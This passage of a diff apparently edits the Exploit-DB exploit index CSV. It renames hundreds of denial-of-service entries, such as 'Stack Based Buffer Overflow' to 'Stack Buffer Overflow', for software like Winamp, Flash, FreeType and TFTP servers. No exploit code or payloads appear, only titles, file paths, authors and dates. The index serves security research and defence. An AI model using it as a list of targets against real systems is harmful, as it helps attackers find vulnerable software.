Overflow",2006-03-16,"Michal Zalewski",dos,windows, 24968,exploits/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,dos,windows,514 24951,exploits/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,dos,linux, -24952,exploits/windows/dos/24952.py,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service",2013-04-12,xis_one,dos,windows,69 +24952,exploits/windows/dos/24952.py,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service",2013-04-12,xis_one,dos,windows,69 24962,exploits/windows/dos/24962.txt,"Foxit Reader 5.4.3.x < 5.4.5.0124 - PDF XREF Parsing Denial of Service",2013-04-18,FuzzMyApp,dos,windows, 24966,exploits/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",dos,windows, 24972,exploits/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String",2013-04-22,Kurono,dos,windows, @@ -3353,7 +3353,7 @@ id,file,description,date,author,type,platform,port 25281,exploits/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,dos,windows, 25287,exploits/linux/dos/25287.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)",2005-03-28,"ilja van sprundel",dos,linux, 25295,exploits/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",dos,hardware, -25303,exploits/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow",2005-03-28,"Gael Delalleau",dos,linux, +25303,exploits/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Buffer Overflow",2005-03-28,"Gael Delalleau",dos,linux, 25322,exploits/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,dos,linux, 25326,exploits/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",dos,windows, 25329,exploits/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",dos,windows, @@ -3390,7 +3390,7 @@ id,file,description,date,author,type,platform,port 25699,exploits/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 - Infinite Loop Denial of Service",2005-05-24,"Luigi Auriemma",dos,windows, 25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware, 25712,exploits/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution",2013-05-26,rgod,dos,windows, -25714,exploits/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow",2013-05-26,LiquidWorm,dos,windows, +25714,exploits/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Overflow",2013-05-26,LiquidWorm,dos,windows, 25719,exploits/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,dos,windows, 25736,exploits/hardware/dos/25736.txt,"Nokia 9500 - vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware, 25737,exploits/windows/dos/25737.txt,"Microsoft Windows 98SE - 'User32.dll' Icon Handling Denial of Service",2005-05-26,klistas,dos,windows, @@ -3453,7 +3453,7 @@ id,file,description,date,author,type,platform,port 26548,exploits/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",dos,hardware, 26555,exploits/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,dos,windows, 26557,exploits/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",dos,windows, -26558,exploits/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",dos,windows, +26558,exploits/windows/dos/26558.txt,"Winamp 5.63 - Stack Buffer Overflow",2013-07-02,"Julien Ahrens",dos,windows, 26575,exploits/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",dos,windows, 26578,exploits/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,dos,windows, 26601,exploits/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",dos,linux, @@ -3549,7 +3549,7 @@ id,file,description,date,author,type,platform,port 27670,exploits/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,dos,linux, 27700,exploits/windows/dos/27700.py,"VideoLAN VLC Media Player 2.0.8 - '.m3u' Local Crash (PoC)",2013-08-19,Asesino04,dos,windows, 27714,exploits/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow",2006-04-20,"Tom Ferris",dos,osx, -27715,exploits/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",dos,osx, +27715,exploits/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",dos,osx, 27723,exploits/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",dos,linux, 27730,exploits/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",dos,multiple, 27745,exploits/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,dos,windows, @@ -3709,7 +3709,7 @@ id,file,description,date,author,type,platform,port 29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple, 29473,exploits/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",dos,linux, 29362,exploits/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",dos,multiple, -40960,exploits/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)",2016-12-22,Skylined,dos,windows, +40960,exploits/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056)",2016-12-22,Skylined,dos,windows, 29387,exploits/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",dos,windows, 29399,exploits/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflows",2007-01-06,LMH,dos,linux, 29402,exploits/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,dos,hardware, @@ -3859,7 +3859,7 @@ id,file,description,date,author,type,platform,port 30550,exploits/windows/dos/30550.php,"Ofilter Player 1.1 - '.wav' Integer Division by Zero",2013-12-28,"Osanda Malith",dos,windows, 30566,exploits/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",dos,multiple, 30574,exploits/multiple/dos/30574.txt,"CellFactor REvolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",dos,multiple, -30578,exploits/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",dos,linux, +30578,exploits/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Buffer Overflow",2007-09-12,"Code Audit Labs",dos,linux, 30579,exploits/linux/dos/30579.txt,"Media Player Classic 6.4.9 - Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",dos,linux, 32400,exploits/multiple/dos/32400.html,"Foxmail Email Client 6.5 - 'mailto' Buffer Overflow",2008-09-22,sebug,dos,multiple, 31913,exploits/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - '.m3u' Crash (PoC)",2014-02-26,"Gabor Seljan",dos,windows, @@ -3911,8 +3911,8 @@ id,file,description,date,author,type,platform,port 30898,exploits/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP - 'asn1_get_string()' Remote Buffer Overflow",2007-11-06,wei_wang,dos,linux, 30902,exploits/linux/dos/30902.c,"Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service",2007-12-19,"Clemens Kurtenbach",dos,linux, 30903,exploits/multiple/dos/30903.c,"id3lib ID3 Tags - Buffer Overflow",2007-12-19,"Luigi Auriemma",dos,multiple, -30906,exploits/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",dos,multiple, -30922,exploits/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow",2007-12-21,"Luigi Auriemma",dos,multiple, +30906,exploits/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",dos,multiple, +30922,exploits/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow",2007-12-21,"Luigi Auriemma",dos,multiple, 30956,exploits/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",dos,linux, 30934,exploits/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",dos,windows, 30936,exploits/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",dos,windows, @@ -3940,7 +3940,7 @@ id,file,description,date,author,type,platform,port 31148,exploits/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",dos,multiple, 31150,exploits/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",dos,multiple, 31306,exploits/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,dos,hardware, -31307,exploits/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",dos,android, +31307,exploits/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Buffer Overflow",2008-03-04,"Alfredo Ortega",dos,android, 31168,exploits/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,dos,windows, 31176,exploits/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",dos,windows, 31177,exploits/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",dos,windows, @@ -3951,7 +3951,7 @@ id,file,description,date,author,type,platform,port 31205,exploits/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,dos,windows, 31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",dos,linux, 31220,exploits/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,dos,linux, -31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,dos,windows, +31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Buffer Overflow (PoC)",2014-01-27,Citadelo,dos,windows, 31223,exploits/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,dos,multiple, 31232,exploits/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",dos,multiple, 40356,exploits/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",dos,multiple, @@ -4021,7 +4021,7 @@ id,file,description,date,author,type,platform,port 31818,exploits/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",dos,windows, 31819,exploits/windows/dos/31819.pl,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",dos,windows, 31856,exploits/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite",2008-05-28,Nine:Situations:Group,dos,windows, -31872,exploits/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow",2008-06-04,"Alfredo Ortega",dos,multiple, +31872,exploits/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow",2008-06-04,"Alfredo Ortega",dos,multiple, 31876,exploits/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method",2008-06-03,"Dennis Rand",dos,windows, 31877,exploits/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",dos,windows, 31878,exploits/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",dos,windows, @@ -4049,7 +4049,7 @@ id,file,description,date,author,type,platform,port 32006,exploits/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service Vulnerabilities",2008-06-30,"Noam Rathus",dos,multiple, 32009,exploits/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",dos,unix, 32018,exploits/linux/dos/32018.txt,"Firefox / Evince / EoG / GIMP - '.SVG' File Processing Denial of Service",2008-07-08,"Kristian Hermansen",dos,linux, -32019,exploits/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,dos,linux, +32019,exploits/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Buffer Overflow",2008-07-09,astrange,dos,linux, 32054,exploits/windows/dos/32054.py,"MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,dos,windows, 32056,exploits/windows/dos/32056.py,"BitComet 1.02 - URI Handling Remote Denial of Service",2008-07-16,Shinnok,dos,windows, 32086,exploits/multiple/dos/32086.c,"SWAT 4 - Multiple Denial of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",dos,multiple, @@ -4060,7 +4060,7 @@ id,file,description,date,author,type,platform,port 32127,exploits/multiple/dos/32127.txt,"Unreal Tournament 3 - Memory Corruption (Denial of Service)",2008-07-30,"Luigi Auriemma",dos,multiple, 32136,exploits/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",dos,osx, 32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",dos,multiple, -32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple, +32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple, 32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,dos,multiple, 32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,dos,multiple, 32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",dos,multiple, @@ -4068,7 +4068,7 @@ id,file,description,date,author,type,platform,port 32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,dos,windows, 32248,exploits/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",dos,linux, 32256,exploits/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,dos,windows, -32332,exploits/windows/dos/32332.txt,"Free Download Manager - Stack Based Buffer Overflow",2014-03-17,"Julien Ahrens",dos,windows,80 +32332,exploits/windows/dos/32332.txt,"Free Download Manager - Stack Buffer Overflow",2014-03-17,"Julien Ahrens",dos,windows,80 32292,exploits/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial of Service",2008-08-23,"Luka Treiber",dos,linux, 32294,exploits/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",dos,windows, 32304,exploits/linux/dos/32304.txt,"RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",dos,linux, @@ -4355,7 +4355,7 @@ id,file,description,date,author,type,platform,port 34442,exploits/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,dos,windows, 34457,exploits/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial of Service",2009-08-14,"Luigi Auriemma",dos,multiple, 34458,exploits/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)",2014-08-28,PhysicalDrive0,dos,windows, -34460,exploits/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",dos,windows, +34460,exploits/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",dos,windows, 34463,exploits/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",dos,windows, 34480,exploits/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",dos,windows, 34502,exploits/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow",2009-08-09,"lvac lvac",dos,windows, @@ -4453,7 +4453,7 @@ id,file,description,date,author,type,platform,port 35613,exploits/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)",2011-04-13,waKKu,dos,multiple, 35622,exploits/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,dos,windows, 35637,exploits/android/dos/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",dos,android, -35656,exploits/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,dos,windows, +35656,exploits/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Buffer Overflow",2011-04-25,KedAns-Dz,dos,windows, 35654,exploits/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",dos,windows, 35725,exploits/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",dos,multiple, 35738,exploits/linux/dos/35738.php,"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",dos,linux, @@ -4675,13 +4675,13 @@ id,file,description,date,author,type,platform,port 37876,exploits/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",dos,lin_x86-64, 37877,exploits/multiple/dos/37877.txt,"Adobe Flash - textfield.gridFitType Use-After-Free",2015-08-19,"Google Security Research",dos,multiple, 37878,exploits/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",dos,multiple, -37879,exploits/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",dos,lin_x86-64, -37880,exploits/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",dos,lin_x86-64, +37879,exploits/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",dos,lin_x86-64, +37880,exploits/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",dos,lin_x86-64, 37881,exploits/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",dos,win_x86, 37882,exploits/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",dos,multiple, 37883,exploits/windows/dos/37883.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (3)",2015-08-19,bilou,dos,windows, 37884,exploits/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,dos,windows, -37893,exploits/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Based Buffer Overflow",2015-08-20,Un_N0n,dos,windows,21 +37893,exploits/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Buffer Overflow",2015-08-20,Un_N0n,dos,windows,21 37897,exploits/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",dos,linux, 37905,exploits/windows/dos/37905.rb,"PowerTCP WebServer for - ActiveX Denial of Service",2012-09-28,catatonicprime,dos,windows, 37908,exploits/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)",2015-08-21,"Shankar Damodaran",dos,windows,21 @@ -4704,12 +4704,12 @@ id,file,description,date,author,type,platform,port 37954,exploits/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",dos,windows,25 37957,exploits/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,dos,windows, 37966,exploits/windows/dos/37966.txt,"Microsoft Office 2007 - OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",dos,windows, -37967,exploits/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow",2015-08-25,"Google Security Research",dos,windows, +37967,exploits/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Buffer Overflow",2015-08-25,"Google Security Research",dos,windows, 37976,exploits/windows/dos/37976.py,"VideoLAN VLC Media Player 2.2.1 - m3u8/m3u Crash (PoC)",2015-08-26,"Naser Farhadi",dos,windows, 37980,exploits/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",dos,windows, 37981,exploits/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,dos,windows, 37984,exploits/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,dos,windows, -37986,exploits/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,dos,windows, +37986,exploits/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Buffer Overflow",2015-08-27,Un_N0n,dos,windows, 37990,exploits/multiple/dos/37990.txt,"QEMU - Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",dos,multiple, 37997,exploits/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,dos,ios,3030 38014,exploits/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,dos,windows,22 @@ -4719,7 +4719,7 @@ id,file,description,date,author,type,platform,port 38032,exploits/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",dos,ios, 38038,exploits/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",dos,multiple, 38052,exploits/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,dos,windows,21 -38053,exploits/windows/dos/38053.txt,"Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow",2015-09-01,Un_N0n,dos,windows, +38053,exploits/windows/dos/38053.txt,"Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow",2015-09-01,Un_N0n,dos,windows, 38054,exploits/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)",2015-09-01,KoreLogic,dos,windows, 38055,exploits/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)",2015-09-01,KoreLogic,dos,windows, 38059,exploits/bsd/dos/38059.c,"OpenBSD 4.x - Portmap Remote Denial of Service",2012-11-22,auto236751,dos,bsd, @@ -4783,7 +4783,7 @@ id,file,description,date,author,type,platform,port 38392,exploits/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",dos,linux, 38399,exploits/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,dos,windows, 38404,exploits/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,dos,windows, -38405,exploits/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,dos,windows, +38405,exploits/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Buffer Overflow",2015-10-06,Un_N0n,dos,windows, 38419,exploits/windows/dos/38419.txt,"SmallFTPd - Denial of Service",2013-04-03,AkaStep,dos,windows, 38420,exploits/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,dos,multiple, 38421,exploits/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,dos,linux, @@ -4816,16 +4816,16 @@ id,file,description,date,author,type,platform,port 38616,exploits/multiple/dos/38616.txt,"Python 2.7 - 'array.fromstring' Method Use-After-Free",2015-11-03,"John Leitch",dos,multiple, 38617,exploits/windows/dos/38617.txt,"Python 2.7 - 'strop.replace()' Method Integer Overflow",2015-11-03,"John Leitch",dos,windows, 38618,exploits/windows/dos/38618.txt,"Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read",2015-11-03,"John Leitch",dos,windows, -38620,exploits/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",dos,linux, +38620,exploits/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Out-of-Bounds Reads",2015-11-04,"Google Security Research",dos,linux, 38622,exploits/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",dos,linux, 38623,exploits/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",dos,multiple, 38626,exploits/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,dos,multiple, 38650,exploits/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash (PoC)",2015-11-07,"Luis Martínez",dos,windows, 39374,exploits/osx/dos/39374.c,"Apple Mac OSX Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",dos,osx, 38659,exploits/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,dos,windows, -38662,exploits/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based 